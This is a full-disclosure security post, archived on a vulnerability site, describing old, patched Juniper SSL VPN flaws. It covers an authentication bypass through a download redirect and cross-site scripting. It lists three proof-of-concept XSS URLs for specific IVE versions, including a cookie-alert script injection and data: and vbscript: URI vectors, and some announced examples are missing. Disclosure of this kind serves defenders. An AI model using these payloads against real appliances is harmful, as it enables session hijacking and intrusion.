some ooold Juniper bugs (was: [Full-disclosure] ZDI-10-231: Juniper Secure Access Series meeting_testjava.cgi XSS Vulnerability)

Type securityvulns
Reporter Securityvulns
Modified 2010-11-09T00:00:00


This reminded me of a bunch of problems I spotted in Juniper SSL VPN a while ago; they are apparently fixed, but I don't recall seeing any public vendor advisory / credit for reporting them - so here you go, even if just for the record...

These were fixed by Juniper in IVE 6.3R1, 6.2R3, 6.1R5, 6.0R8, and 5.5 R7.1 over a year ago.

1) Auth bypass - IVE permitted just about any script on the box to be invoked without authentication by going through a /dana-na/download/?url= hop, for example:


2) XSS flaws (which are pretty bad in SSL VPN appliances, because they completely trash the security model of this access mode):

This worked in IVE 6.2: https://<IVE>/dana-na/meeting/meeting_testresult.cgi?redir=%2Fdana-na%2Fmeeting%2Flogin_meeting.cgi%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&java=1

This worked with IVE 5.5 & Firefox: https://<IVE>/dana-na/download/?url=/dana/home/launch.cgi?url=data:text/html%3bbase64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ%2b

This worked with IVE 5.5 & MSIE: https://<IVE>/dana-na/download/?url=/dana/home/launch.cgi?url=vbscript:MsgBox(%2522Hi%2522)

XSS + response splitting:


And some more vanilla XSSes: